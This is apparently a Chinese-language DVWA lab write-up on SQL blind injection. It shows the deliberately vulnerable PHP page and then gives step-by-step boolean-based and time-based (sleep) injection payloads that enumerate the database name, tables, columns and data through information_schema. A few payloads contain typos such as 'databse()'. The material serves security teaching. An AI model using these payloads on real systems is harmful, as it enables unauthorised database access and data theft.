本文详细解析了SQL盲注攻击的原理与利用方法,包括基于布尔和时间的盲注技术,通过实例展示了如何猜解数据库名、表名、字段名及数据。
文章目录
Low
代码分析:
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysql_numrows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
mysql_close();
}
?>
这里是SQL盲注漏洞
漏洞利用
基于布尔的盲注:
1)判断是否存在注入,注入是字符型还是数字型
如何判断是字符型注入还是数字型注入
输入
1 and 1=1
1and 1=2,
页面回显相同,显示相应用户存在:
输入
1’ and ‘1’='1 ,显示相应用户存在:
1’and ‘1’='2,显示相应用户不存在:
页面回显不一致
得出结论:字符串注入
2)猜解数据库名
想要猜解数据库名,首先要猜解数据库名的长度,然后挨个猜解字符。
输入1’ and length(database())=1 #,显示不存在;
输入1’ andlength(database())=2 #,显示不存在;
输入1’ and length(database())=3 #,显示不存在;
输入1’ and length(database())=4 #,显示存在:
说明数据库名长度为4。
下面采用二分法猜解数据库名。
输入1’ and ascii(substr(databse(),1,1))>97
显示存在,说明数据库名的第一个字符的ascii值大于97(小写字母a的ascii值);
输入1’ and ascii(substr(databse(),1,1))<122
显示存在,说明数据库名的第一个字符的ascii值小于122(小写字母z的ascii值);
输入1’ and ascii(substr(databse(),1,1))<109
显示存在,说明数据库名的第一个字符的ascii值小于109(小写字母m的ascii值);
输入1’ and ascii(substr(databse(),1,1))<103
显示存在,说明数据库名的第一个字符的ascii值小于103(小写字母g的ascii值);
输入1’ and ascii(substr(databse(),1,1))<100
显示不存在,说明数据库名的第一个字符的ascii值不小于100(小写字母d的ascii值);
输入1’ and ascii(substr(databse(),1,1))>100
显示不存在,说明数据库名的第一个字符的ascii值不大于100(小写字母d的ascii值),所以数据库名的第一个字符的ascii值为100,即小写字母d。
**
…
**
重复上述步骤,就可以猜解出完整的数据库名(dvwa)了。
3)猜解数据库中的表名
首先猜解数据库中表的数量:
1’ and (select count (table_name) from information_schema.tables where
table_schema=database())=1 # 显示不存在1’ and (select count (table_name) from information_schema.tables where
table_schema=database() )=2 # 显示存在
说明数据库中共有两个表。
接着挨个猜解表名:
1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit
0,1),1))=1 # 显示不存在 1’ and length(substr((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1))=2 # 显示不存在
… 1’ and length(substr((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1))=9 # 显示存在
说明第一个表名长度为9。
1’ and ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))>97 # 显示存在1’ and ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))<122 # 显示存在1’ and ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))<109 # 显示存在1’ and ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))<103 # 显示不存在1’ and ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))>103 # 显示不存在
说明第一个表的名字的第一个字符为小写字母g。
…
重复上述步骤,即可猜解出两个表名(guestbook、users)。
4)猜解表中的字段名
首先猜解表中字段的数量:
1’ and (select count(column_name) from information_schema.columns
where table_name= ’users’)=1 # 显示不存在…
1’ and (select count(column_name) from information_schema.columns
where table_name= ’users’)=8 # 显示存在
说明users表有8个字段。
接着挨个猜解字段名:
1’ and length(substr((select column_name from
information_schema.columns where table_name= ’users’ limit 0,1),1))=1
显示不存在…
1’ and length(substr((select column_name from
information_schema.columns where table_name= ’users’ limit 0,1),1))=7
显示存在说明users表的第一个字段为7个字符长度。
采用二分法,即可猜解出所有字段名。
5)猜解数据
同样采用二分法。
基于时间的盲注
1)判断是否存在注入,注入是字符型还是数字型
输入1’ and sleep(5) #,感觉到明显延迟;
输入1 and sleep(5) #,没有延迟;
说明存在字符型的基于时间的盲注。
2).猜解当前数据库名
首先猜解数据名的长度:
1’ and if(length(database())=1,sleep(5),1) # 没有延迟
1’ and if(length(database())=2,sleep(5),1) # 没有延迟
1’ and if(length(database())=3,sleep(5),1) # 没有延迟
1’ and if(length(database())=4,sleep(5),1) # 明显延迟
说明数据库名长度为4个字符。
接着采用二分法猜解数据库名:
1’ and if(ascii(substr(database(),1,1))>97,sleep(5),1)# 明显延迟
…
1’ and if(ascii(substr(database(),1,1))<100,sleep(5),1)# 没有延迟
1’ and if(ascii(substr(database(),1,1))>100,sleep(5),1)# 没有延迟
说明数据库名的第一个字符为小写字母d。
…
重复上述步骤,即可猜解出数据库名。
3)猜解数据库中的表名
首先猜解数据库中表的数量:
1’ and if((select count(table_name) from information_schema.tables
where table_schema=database() )=1,sleep(5),1)# 没有延迟1’ and if((select count(table_name) from information_schema.tables
where table_schema=database() )=2,sleep(5),1)# 明显延迟
说明数据库中有两个表。
接着挨个猜解表名:
1’ and if(length(substr((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1))=1,sleep(5),1) # 没有延迟…
1’ and if(length(substr((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1))=9,sleep(5),1) # 明显延迟
说明第一个表名的长度为9个字符。
采用二分法即可猜解出表名。
4)猜解表中的字段名
首先猜解表中字段的数量:
1’ and if((select count(column_name) from information_schema.columns
where table_name= ’users’)=1,sleep(5),1)# 没有延迟…
1’ and if((select count(column_name) from information_schema.columns
where table_name= ’users’)=8,sleep(5),1)# 明显延迟
说明users表中有8个字段。
接着挨个猜解字段名:
1’ and if(length(substr((select column_name from
information_schema.columns where table_name= ’users’ limit
0,1),1))=1,sleep(5),1) # 没有延迟…
1’ and if(length(substr((select column_name from
information_schema.columns where table_name= ’users’ limit
0,1),1))=7,sleep(5),1) # 明显延迟
说明users表的第一个字段长度为7个字符。
采用二分法即可猜解出各个字段名。
5)猜解数据
同样采用二分法。
扫一扫
3024
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
